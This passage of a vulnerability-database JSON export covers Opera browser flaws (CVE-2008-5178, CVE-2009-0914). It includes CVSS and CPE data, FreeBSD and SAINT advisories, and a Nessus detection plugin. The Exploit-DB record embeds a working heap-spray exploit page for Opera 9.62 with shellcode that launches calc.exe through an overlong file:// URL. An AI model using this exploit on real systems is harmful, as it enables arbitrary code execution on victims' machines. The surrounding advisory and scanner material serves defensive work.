"integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0914"], "modified": "2017-09-29T01:34:00", "cpe": ["cpe:/a:opera:opera_browser:9.61", "cpe:/a:opera:opera_browser:8.53", "cpe:/a:opera:opera_browser:3.21", "cpe:/a:opera:opera_browser:3.62", "cpe:/a:opera:opera_browser:7.21", "cpe:/a:opera:opera_browser:6.1", "cpe:/a:opera:opera_browser:7.50", "cpe:/a:opera:opera_browser:9.27", "cpe:/a:opera:opera_browser:7.03", "cpe:/a:opera:opera_browser:5.11", "cpe:/a:opera:opera_browser:8.0", "cpe:/a:opera:opera_browser:1.00", "cpe:/a:opera:opera_browser:8.54", "cpe:/a:opera:opera_browser:7.51", "cpe:/a:opera:opera_browser:7.22", "cpe:/a:opera:opera_browser:8.50", "cpe:/a:opera:opera_browser:6.06", "cpe:/a:opera:opera_browser:9.0", "cpe:/a:opera:opera_browser:9.20", "cpe:/a:opera:opera_browser:7.20", "cpe:/a:opera:opera_browser:7.0", "cpe:/a:opera:opera_browser:3.51", "cpe:/a:opera:opera_browser:2.00", "cpe:/a:opera:opera_browser:3.50", "cpe:/a:opera:opera_browser:9.26", "cpe:/a:opera:opera_browser:2.10", "cpe:/a:opera:opera_browser:2.12", "cpe:/a:opera:opera_browser:4.02", "cpe:/a:opera:opera_browser:9.63", "cpe:/a:opera:opera_browser:6.11", "cpe:/a:opera:opera_browser:9.23", "cpe:/a:opera:opera_browser:8.02", "cpe:/a:opera:opera_browser:6.02", "cpe:/a:opera:opera_browser:5.02", "cpe:/a:opera:opera_browser:5.0", "cpe:/a:opera:opera_browser:8.51", "cpe:/a:opera:opera_browser:8.01", "cpe:/a:opera:opera_browser:9.25", "cpe:/a:opera:opera_browser:6.04", "cpe:/a:opera:opera_browser:9.50", "cpe:/a:opera:opera_browser:4.01", "cpe:/a:opera:opera_browser:9.60", "cpe:/a:opera:opera_browser:6.01", "cpe:/a:opera:opera_browser:9.21", "cpe:/a:opera:opera_browser:6.03", "cpe:/a:opera:opera_browser:3.00", "cpe:/a:opera:opera_browser:9.52", "cpe:/a:opera:opera_browser:9.12", "cpe:/a:opera:opera_browser:9.24", "cpe:/a:opera:opera_browser:7.52", "cpe:/a:opera:opera_browser:7.54", "cpe:/a:opera:opera_browser:7.60", "cpe:/a:opera:opera_browser:9.62", "cpe:/a:opera:opera_browser:6.12", "cpe:/a:opera:opera_browser:9.51", "cpe:/a:opera:opera_browser:6.0", "cpe:/a:opera:opera_browser:7.10", "cpe:/a:opera:opera_browser:7.53", "cpe:/a:opera:opera_browser:3.60", "cpe:/a:opera:opera_browser:5.10", "cpe:/a:opera:opera_browser:5.12", "cpe:/a:opera:opera_browser:7.01", "cpe:/a:opera:opera_browser:9.02", "cpe:/a:opera:opera_browser:9.22", "cpe:/a:opera:opera_browser:3.10", "cpe:/a:opera:opera_browser:8.52", "cpe:/a:opera:opera_browser:3.61", "cpe:/a:opera:opera_browser:9.10", "cpe:/a:opera:opera_browser:9.01", "cpe:/a:opera:opera_browser:4.00", "cpe:/a:opera:opera_browser:6.05", "cpe:/a:opera:opera_browser:7.02", "cpe:/a:opera:opera_browser:7.11", "cpe:/a:opera:opera_browser:7.23"], "id": "CVE-2009-0914", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0914", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:opera:opera_browser:1.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.54:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.62:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.62:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.61:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.50:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.60:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:update2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta6:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.25:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:update1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta7:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.04:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.61:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.20:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.63:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.27:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.06:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.20:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.23:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.53:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta6:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.22:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta1_v2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.26:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.05:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.50:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.60:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta4:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.21:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.10:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.50:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.12:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.24:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.50:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.20:beta7:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.00:beta:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.11:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.03:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:2.10:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.54:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.11:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:4.00:beta5:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.03:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.1:beta1:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:7.52:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:9.01:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.02:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:beta8:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.51:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.00:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:6.0:tp3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:8.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:opera:opera_browser:3.62:beta:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T01:29:20", "description": "Opera 9.62 file:// Local Heap Overflow Exploit. CVE-2008-5178,CVE-2008-5680. Local exploit for windows platform", "published": "2008-11-17T00:00:00", "type": "exploitdb", "title": "Opera 9.62 file:// Local Heap Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5680", "CVE-2008-5178"], "modified": "2008-11-17T00:00:00", "id": "EDB-ID:7135", "href": "https://www.exploit-db.com/exploits/7135/", "sourceData": "<html>\n<head><title>uh?</title></head>\n<body>\n<script>\n\n\t\n\t// k`sOSe 11/15/2008\n\t// tested on Windows XP SP3, opera 9.62 international version\n\t// vulnerability found by send9\n\n\t// there are many ways to achieve code execution, tons of function pointers to overwrite.\n\t// maybe there's one more reliable...\n\n\tvar i=0;\n\t\n\t// push es, pop es\n\tvar block = unescape(\"%u0607%u0607\"); \n\n\t// metasploit WinExec c:\\WINDOWS\\system32\\calc.exe\n\tvar shellcode = unescape(\"%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100\");\n\n\twhile (block.length < 81920) block += block;\n\tvar memory = new Array();\n\tfor (;i<1000;i++) memory[i] += (block + shellcode);\n\n\n\tvar evil = \"file://\";\n\n for(var i = 0; i<16438; i++)\n evil += \"X\";\n\n\tevil += \"R.\"; \n\n\twindow.location.replace(evil);\n\n</script>\n\n</body>\n</html>\n\n# milw0rm.com [2008-11-17]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7135/"}], "d2": [{"lastseen": "2019-05-29T17:19:07", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5178"], "description": "**Name**| d2sec_operaheap \n---|--- \n**CVE**| CVE-2008-5178 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| Opera Web Browser file:// Heap Overflow \n**Notes**| \n", "edition": 2, "modified": "2008-11-20T15:30:00", "published": "2008-11-20T15:30:00", "id": "D2SEC_OPERAHEAP", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_operaheap", "title": "DSquare Exploit Pack: D2SEC_OPERAHEAP", "type": "d2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5178"], "description": "Added: 01/13/2009 \nCVE: [CVE-2008-5178](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5178>) \nBID: [32323](<http://www.securityfocus.com/bid/32323>) \nOSVDB: [49882](<http://www.osvdb.org/49882>) \n\n\n### Background\n\n[Opera](<http://www.opera.com>) is a web browser which is available for multiple platforms. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a long, specially crafted file:// URI. \n\n### Resolution\n\n[Upgrade](<http://www.opera.com/browser/download/>) to Opera 9.63 or higher. \n\n### References\n\n<http://secunia.com/advisories/34294> \n\n\n### Limitations\n\nExploit works on Opera 9.62 and requires a user to load the exploit page in Opera. \n\nDue to the nature of the vulnerability, the success of the exploit may depend on the target's memory state. \n\n### Platforms\n\nWindows XP \n \n\n", "edition": 1, "modified": "2009-01-13T00:00:00", "published": "2009-01-13T00:00:00", "id": "SAINT:CBD9349B31AFF70B68118678A7F60371", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/opera_file_uri", "type": "saint", "title": "Opera file URI buffer overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:52", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5178"], "edition": 2, "description": "Added: 01/13/2009 \nCVE: [CVE-2008-5178](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5178>) \nBID: [32323](<http://www.securityfocus.com/bid/32323>) \nOSVDB: [49882](<http://www.osvdb.org/49882>) \n\n\n### Background\n\n[Opera](<http://www.opera.com>) is a web browser which is available for multiple platforms. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a long, specially crafted file:// URI. \n\n### Resolution\n\n[Upgrade](<http://www.opera.com/browser/download/>) to Opera 9.63 or higher. \n\n### References\n\n<http://secunia.com/advisories/34294> \n\n\n### Limitations\n\nExploit works on Opera 9.62 and requires a user to load the exploit page in Opera. \n\nDue to the nature of the vulnerability, the success of the exploit may depend on the target's memory state. \n\n### Platforms\n\nWindows XP \n \n\n", "modified": "2009-01-13T00:00:00", "published": "2009-01-13T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/opera_file_uri", "id": "SAINT:8702592346709BB1DA31739DE1679D81", "type": "saint", "title": "Opera file URI buffer overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:32", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5178"], "description": "Added: 01/13/2009 \nCVE: [CVE-2008-5178](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5178>) \nBID: [32323](<http://www.securityfocus.com/bid/32323>) \nOSVDB: [49882](<http://www.osvdb.org/49882>) \n\n\n### Background\n\n[Opera](<http://www.opera.com>) is a web browser which is available for multiple platforms. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a long, specially crafted file:// URI. \n\n### Resolution\n\n[Upgrade](<http://www.opera.com/browser/download/>) to Opera 9.63 or higher. \n\n### References\n\n<http://secunia.com/advisories/34294> \n\n\n### Limitations\n\nExploit works on Opera 9.62 and requires a user to load the exploit page in Opera. \n\nDue to the nature of the vulnerability, the success of the exploit may depend on the target's memory state. \n\n### Platforms\n\nWindows XP \n \n\n", "edition": 4, "modified": "2009-01-13T00:00:00", "published": "2009-01-13T00:00:00", "id": "SAINT:7BA284695A3EAA34108F9FE8A5E97F15", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/opera_file_uri", "title": "Opera file URI buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:20", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5178"], "description": "\nThe Opera Team reports:\n\nManipulating certain text-area contents can cause a buffer\n\t overflow, which may be exploited to execute arbitrary code.\nCertain HTML constructs can cause the resulting DOM to change\n\t unexpectedly, which triggers a crash. To inject code, additional\n\t techniques will have to be employed.\nExceptionally long host names in file: URLs can cause a buffer\n\t overflow, which may be exploited to execute arbitrary code. Remote Web\n\t pages cannot refer to file: URLs, so successful exploitation involves\n\t tricking users into manually opening the exploit URL, or a local file\n\t that refers to it.\nWhen Opera is previewing a news feed, some scripted URLs are not\n\t correctly blocked. These can execute scripts which are able to\n\t subscribe the user to any feed URL that the attacker chooses, and can\n\t also view the contents of any feeds that the user is subscribed to.\n\t These may contain sensitive information.\nBuilt-in XSLT templates incorrectly handle escaped content and can\n\t cause it to be treated as markup. If a site accepts content from\n\t untrusted users, which it then displays using XSLT as escaped strings,\n\t this can allow scripted markup to be injected. The scripts will then\n\t be executed in the security context of that site.\n\n", "edition": 4, "modified": "2008-11-18T00:00:00", "published": "2008-11-18T00:00:00", "id": "225BC349-CE10-11DD-A721-0030843D3802", "href": "https://vuxml.freebsd.org/freebsd/225bc349-ce10-11dd-a721-0030843d3802.html", "title": "opera -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0915", "CVE-2009-0914"], "description": "\nOpera Team reports:\n\nAn unspecified error in the processing of JPEG images can be\n\t exploited to trigger a memory corruption.\nAn error can be exploited to execute arbitrary script code in a\n\t different domain via unspecified plugins.\nAn unspecified error has a \"moderately severe\" impact. No further\n\t information is available.\n\n", "edition": 4, "modified": "2010-05-02T00:00:00", "published": "2009-03-15T00:00:00", "id": "8C5205B4-11A0-11DE-A964-0030843D3802", "href": "https://vuxml.freebsd.org/freebsd/8c5205b4-11a0-11de-a964-0030843d3802.html", "title": "opera -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-07T10:40:36", "description": "The Opera Team reports :\n\nManipulating certain text-area contents can cause a buffer overflow,\nwhich may be exploited to execute arbitrary code.\n\nCertain HTML constructs can cause the resulting DOM to change\nunexpectedly, which triggers a crash. To inject code, additional\ntechniques will have to be employed.\n\nExceptionally long host names in file: URLs can cause a buffer\noverflow, which may be exploited to execute arbitrary code. Remote Web\npages cannot refer to file: URLs, so successful exploitation involves\ntricking users into manually opening the exploit URL, or a local file\nthat refers to it.\n\nWhen Opera is previewing a news feed, some scripted URLs are not\ncorrectly blocked. These can execute scripts which are able to\nsubscribe the user to any feed URL that the attacker chooses, and can\nalso view the contents of any feeds that the user is subscribed to.\nThese may contain sensitive information.\n\nBuilt-in XSLT templates incorrectly handle escaped content and can\ncause it to be treated as markup. If a site accepts content from\nuntrusted users, which it then displays using XSLT as escaped strings,\nthis can allow scripted markup to be injected. The scripts will then\nbe executed in the security context of that site.", "edition": 25, "published": "2008-12-21T00:00:00", "title": "FreeBSD : opera -- multiple vulnerabilities (225bc349-ce10-11dd-a721-0030843d3802)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5178"], "modified": "2008-12-21T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-opera", "p-cpe:/a:freebsd:freebsd:opera"], "id": "FREEBSD_PKG_225BC349CE1011DDA7210030843D3802.NASL", "href": "https://www.tenable.com/plugins/nessus/35240", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35240);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-5178\");\n script_xref(name:\"Secunia\", value:\"32752\");\n\n script_name(english:\"FreeBSD : opera -- multiple vulnerabilities (225bc349-ce10-11dd-a721-0030843d3802)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Opera Team reports :\n\nManipulating certain text-area contents can cause a buffer overflow,\nwhich may be exploited to execute arbitrary code.\n\nCertain HTML constructs can cause the resulting DOM to change\nunexpectedly, which triggers a crash. To inject code, additional\ntechniques will have to be employed.\n\nExceptionally long host names in file: URLs can cause a buffer\noverflow, which may be exploited to execute arbitrary code. Remote Web\npages cannot refer to file: URLs, so successful exploitation involves\ntricking users into manually opening the exploit URL, or a local file\nthat refers to it.\n\nWhen Opera is previewing a news feed, some scripted URLs are not\ncorrectly blocked. These can execute scripts which are able to\nsubscribe the user to any feed URL that the attacker chooses, and can\nalso view the contents of any feeds that the user is subscribed to.\nThese may contain sensitive information.\n\nBuilt-in XSLT templates incorrectly handle escaped content and can\ncause it to be treated as markup. If a site accepts content from\nuntrusted users, which it then displays using XSLT as escaped strings,\nthis can allow scripted markup to be injected. The scripts will then\nbe executed in the security context of that site.\"\n );\n # http://www.opera.com/support/kb/view/920/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ed400860\"\n );\n # http://www.opera.com/support/kb/view/921/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?71f5e1a9\"\n );\n # http://www.opera.com/support/kb/view/922/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8cb3b592\"\n );\n # http://www.opera.com/support/kb/view/923/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?185b4896\"\n );\n # http://www.opera.com/support/kb/view/924/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdbb754c\"\n );\n # https://vuxml.freebsd.org/freebsd/225bc349-ce10-11dd-a721-0030843d3802.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?64faa1d7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-opera\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/12/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"opera<9.63\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-opera<9.63\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, 